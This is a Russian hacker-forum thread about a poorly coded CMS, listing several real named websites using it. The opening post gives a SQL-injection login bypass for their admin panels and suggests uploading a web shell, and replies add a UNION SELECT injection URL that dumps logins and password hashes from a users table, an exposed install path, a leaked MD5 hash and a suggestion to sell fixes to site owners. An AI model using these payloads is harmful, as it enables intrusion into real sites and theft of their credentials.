|
Дырявая «cms РусВебДизайн»
Пример того, как не стоит делать CMS.
Офф. сайт - http://ruswebdesign.ru/, причем у них эта CMS не стоит, боятся видимо юзать. Пример: http://www.alpgalka.ru/admin/ Достаточно ввести в поле логин ' or 1/* и нажать Войти. В админке очень удобно загружать шелл. Ну и sql-инъекции типа http://www.alpgalka.ru/?page_id=4' http://www.microplasma.ru/admin/ http://www.akabel.ru/admin/ http://www.eurovolga.ru/admin/ © xaker.name |
кул уязвимость!!! + =)
|
Копирайты поставь) А то все думают, что это ты нашёл)))
|
+1 Don Anton
|
чет я пробовал,логин admin ,эту фичу,но не робит,скорее всего у меня руки кривые
------------------------------ Я ж говорил,что я кривой,надо мне по больше спать =) |
ку
все работает) автору +
|
Прямо говорю )) Дибилы писали xD
|
Цитата:
|
Таверна Античат xDDDDDDDD бля... кто так жестко отжоГ ?
|
http://www.alpgalka.ru/__install/ псц
|
Цитата:
нафига палить античат?? напиши - "сайт содержит уязвимсоти. исправим за разумные деньги."..и тп - и аську..кого-нить из .........)))) |
Ага )) твою :d
|
http://www.xaker.name/forvb/showthread.php?p=73641
|
Цитата:
|
Оба наверно)
|
Кто скопипастил - тот умрет.
|
Cms-говно,долго удивлялся....горе кодеры
_______________________________________ А вот и нубо-детки играються : http://s60.radikal.ru/i170/0808/c1/8a77f9e88c0ft.jpg Столько пафоса =) ну что ж сказать,ТрЮ Хацкер) _________________________________________ Я даже знаю как баг залечить,нужен дед через него захим в админку и все тру хацкеры не могут зайти,ибо выдает,что админ уже залогинен =) ЗЫ:надо будет на милворм написать - они нуждаються в моих творениях) |
прикрыли походу
|
О нет , Web kill , он всех хакнет ............... нед.................. =\\\
|
http://alpgalka.ru/news.php?nid=7'+union+select+1,2,3,4,5,6,7,8+from+ rwd_users/* чо за нах ? :D
|
Цитата:
:D |
Цитата:
Жжошь :) Тока можна намнога прошэ ) http://alpgalka.ru/news.php?nid=7'+union+select+1,login,pass,4,5,6,7, 8+from+rwd_users/* хэш - (мд5) - dcd38f72bf2c2f05fd31ac44d34563b4 |
| Время: 22:44 |